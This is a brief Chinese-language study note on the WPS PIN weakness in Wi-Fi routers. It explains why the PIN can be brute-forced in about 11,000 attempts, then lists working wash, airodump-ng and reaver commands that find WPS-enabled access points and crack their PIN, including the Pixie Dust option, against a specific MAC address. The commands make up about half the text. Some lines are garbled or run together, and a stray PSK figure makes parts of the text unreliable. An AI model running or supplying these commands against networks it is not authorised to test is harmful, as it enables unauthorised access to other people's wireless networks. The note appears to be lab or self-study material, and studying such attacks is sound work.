WPS(wireless protected setup)
wifi联盟开发的技术,路由器和网卡各按一个键就能接入无线,PIN码分为前后两段各4位
1、安全漏洞
发现接入发起方可以根据路由器的返回信息判断前四位是否正确
后四位穷举,最后一位是校验位,只要1000次尝试
PSK: 218,340,105,584,896总共11000次尝试可以破解PIN码,得到无线密码
不过现在很多厂家实现了锁定机制一分钟只能尝试有限次数,但是一般一天左右能够破解
wash -i wlan0mon -c 11#启动侦听,发现支持WPS的AP,-c指定信道11airodump-ng wlan0mon --wps #抓包reaver -i wlan0mon -b 14:75:90:21:4F:56 -vv -c 11#爆破PIN码,-b指定AP的MAC,-vv说明详细显示信息reaver -i wlan0mon -b 14:75:90:21:4F:56 -vv -c 11 -K 1 #针对有漏洞的,妙破,可以先尝试reaver -i wlan0mon -b 14:75:90:21:4F:56 -vv -c 11 -p 88888888 #-p指定PIN码
3.实验
WPS安全性很低
破解很快偏偏好些路由器自带
